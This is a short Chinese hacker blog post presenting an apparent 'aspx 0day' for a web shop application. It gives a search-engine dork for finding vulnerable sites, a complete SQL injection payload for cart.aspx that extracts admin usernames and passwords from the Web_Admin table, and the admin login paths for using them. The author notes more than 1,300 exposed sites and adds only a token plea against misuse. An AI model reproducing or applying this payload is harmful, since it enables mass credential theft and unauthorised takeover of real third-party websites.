一个aspx的0day
这里公布一个关于aspx网站程序的oday方法很简单。直接爆出管理密码。
也是利用注入漏洞。
利用代码
谷歌搜索关键字:inurl:scoreindex.aspx
然后利用下面的代码:
cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 4 [Name],[Pass] From [Web_Admin] Where 1=1 Order by [Name],[Pass]) T Order by [Name] desc,[Pass] desc)>0 --
后台地址:/weblogin/Login.aspx
后台地址/weblogin/index.aspx
这个oday出来也有一段时间了。搜索一下也有1300多个搜索结果,公布漏洞的目标不是为了让大家去搞破坏。希望大家合理利用。
by:小风
qq:66892380
转载请注明来处。。。。。
评论
© Hacker 小风's Blog | Powered by LOFTER